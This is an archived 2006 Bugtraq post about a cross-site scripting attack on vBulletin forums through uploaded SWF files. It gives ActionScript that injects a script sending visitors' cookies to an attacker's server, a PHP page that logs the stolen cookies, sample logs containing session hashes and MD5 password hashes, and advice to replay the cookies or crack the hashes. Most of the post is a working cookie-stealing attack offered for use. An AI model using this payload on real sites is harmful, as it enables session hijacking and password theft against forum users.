lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061224221208.7947.qmail@securityfocus.com>
Date: 24 Dec 2006 22:12:08 -0000
From: ashraf1984@...mail.com
To: bugtraq@...urityfocus.com
Subject: XSS with Vbulletin (new idea !)

Author : Ashraf Morad
Contact : ashraf1984@...mail.com

XSS with vBulletin (Attachments supported , SWF is a valid extension) !

Materials : 

-Any SWF file with an actionscript frame : 

ActionScript Code : 

getURL("javascript:function blab(){}var scriptNode = document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie;blab();");

-PHP page hosted :

UrPHPpage.php code :

<?
$fp = fopen("Mylog.txt","a");
if($_GET['Cookie'])
{
$str="
".date("Y-m-d h:i:s")."^".$_GET['Cookie'];
fwrite($fp,$str);	
}
fclose($fp);
?>

Or you can send the cookie to your email ...

Then the Log file will be like this :

2006-12-22 10:00:57^bbsessionhash=5d5bbd44581e8670511dea2336bf6b7c; bblastvisit=1166967717; bblastactivity=0; bbforum_view=7dc07389c9e27c2ff67b4da319df9596a-1-{i-3_i-1166967717_}; bbuserid=913; bbpassword=ae0f78853127d9847dce0bfe6427bc2d
2006-12-22 10:25:39^bblastvisit=1166967717; bblastactivity=0; bbuserid=9913; bbpassword=ae0f78853127d9847dce0bfe6427bc2d; bbsessionhash=3d085f4ee5d4e4ac7af73e18d8fb6539; bbforum_view=6f750f5b123c84f0be72a9844b9cebaba-1-{i-3_i-1166973674_}

Then you can use any cookie editor or you can crack the MD5 password hash ...

enjoy ;)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ